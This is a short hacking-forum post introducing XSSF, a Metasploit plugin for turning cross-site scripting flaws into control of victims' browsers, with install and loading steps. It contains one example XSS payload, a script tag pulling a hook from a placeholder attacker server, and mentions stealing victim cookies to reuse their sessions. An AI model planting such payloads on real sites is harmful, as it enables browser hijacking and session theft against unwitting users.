IRC Chat
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Xssf Metasploit Plugin

  • 0 Respuestas
  • 2767 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Mayk0

  • *
  • Underc0der
  • Mensajes: 127
  • Actividad:
  • Reputación 0
    • Ver Perfil
    • Hacktivismo Latinoamerica
    • Email
  • Skype: maykozapata
« en: Junio 15, 2013, 02:52:51 pm »
You are not allowed to view links. Register or Login

The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation
task into a much easier work. XSSF allows creating a communication channel with the targeted browser
(from a XSS vulnerability) in order to perform further attacks, its integration into the Metasploit Framework
allows users to launch MSF browser based exploit easilly from an XSS vulnerability,In addition, an interesting
though exploiting an XSS inside a victim's browser could be to browse website on attacker's browser,
using the connected victim's session. In most of cases, simply stealing the victim cookie will be sufficient
to realize this action... 'this tool requires metasploit installed to work'

Installation instructions:
1 - Download the latest Metasploit Framework (MSF) release
2 - Update Ruby to 1.9 if not already done
3 - open terminal and navigate to [ /opt/metasploit/../msf3 ] folder
4 - Download XSSF using SVN repository
[ svn export You are not allowed to view links. Register or Login ./ --force ]

XSSF plugin loading instructions:
1 - Start Metasploit Framework (MSF Console for example)
2 - Load XSSF plugin using the command 'load xssf'
3 - XSSF server port can be modified using the command 'load xssf Port=80'
4 - XSSF server URI can be changed using the command 'load xssf Uri=/'
5 - Example of XSS Attack: <script src=”http://IP-Server-MSF:Port/loop?interval=5”></script>

XSSF home:
[ You are not allowed to view links. Register or Login ]
Source Cod:
[ You are not allowed to view links. Register or Login ]
« Última modificación: Agosto 16, 2014, 10:42:54 am por Expermicid »
You are not allowed to view links. Register or Login


¿Te gustó el post? COMPARTILO!

Explotando "LNK" con MetaSploit 0-day

Iniciado por Devilboy

Respuestas: 0
Vistas: 1451
Último mensaje Julio 23, 2010, 03:14:24 pm
por Devilboy
Administrador Gráfico de Cyber Ataques para Metasploit

Iniciado por staRgan

Respuestas: 2
Vistas: 1778
Último mensaje Junio 26, 2011, 11:58:52 pm
por Ch05piN
Videos Metasploit desde básico hasta avanzado

Iniciado por dvdr

Respuestas: 24
Vistas: 18951
Último mensaje Abril 28, 2016, 11:40:55 am
por Satyricon
Cómo explotar vulnerabilidad de Windows 7 con Metasploit

Iniciado por Pekador

Respuestas: 2
Vistas: 4300
Último mensaje Abril 16, 2012, 04:35:47 pm
Dump skype account our victim for Metasploit

Iniciado por BrowserNet

Respuestas: 0
Vistas: 2087
Último mensaje Mayo 21, 2016, 08:10:13 pm
por BrowserNet